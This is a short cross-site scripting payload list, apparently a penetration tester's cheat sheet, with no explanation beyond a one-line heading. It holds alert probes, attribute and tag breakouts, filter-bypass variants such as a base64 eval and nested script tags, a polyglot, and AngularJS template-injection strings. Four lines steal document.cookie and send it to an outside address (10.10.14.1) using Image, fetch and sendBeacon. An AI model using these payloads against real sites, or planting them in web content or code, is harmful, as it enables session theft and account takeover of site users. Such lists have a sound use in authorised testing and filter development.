Cross-site scripting payloads — basic probes, attribute/context breakout, filter & WAF bypasses, DOM sinks, cookie exfiltration, polyglots and framework (Angular CSTI) injection.
<script>alert(1)</script>
<script>alert(document.domain)</script>
"><script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
" onmouseover="alert(1)
'><svg/onload=alert(1)>
" autofocus onfocus=alert(1) x="
</textarea><script>alert(1)</script>
';alert(1)//
<svG OnLoaD=alert(1)>
<img src=x onerror="alert`1`">
<svg onload=alert(1)>
<scr<script>ipt>alert(1)</scr</script>ipt>
<img src=x onerror=eval(atob('YWxlcnQoMSk='))>
<iframe src=javascript:alert(1)>
#<img src=x onerror=alert(1)>
javascript:alert(document.cookie)
<a href="javascript:alert(1)">x</a>
"><img src=x onerror=alert(1)>
<script>new Image().src='http://10.10.14.1/?c='+document.cookie</script>
<script>fetch('http://10.10.14.1/?c='+document.cookie)</script>
<script>navigator.sendBeacon('http://10.10.14.1',document.cookie)</script>
<img src=x onerror="this.src='http://10.10.14.1/?'+document.cookie">
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtArEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
<x contenteditable onbeforeinput=alert(1)>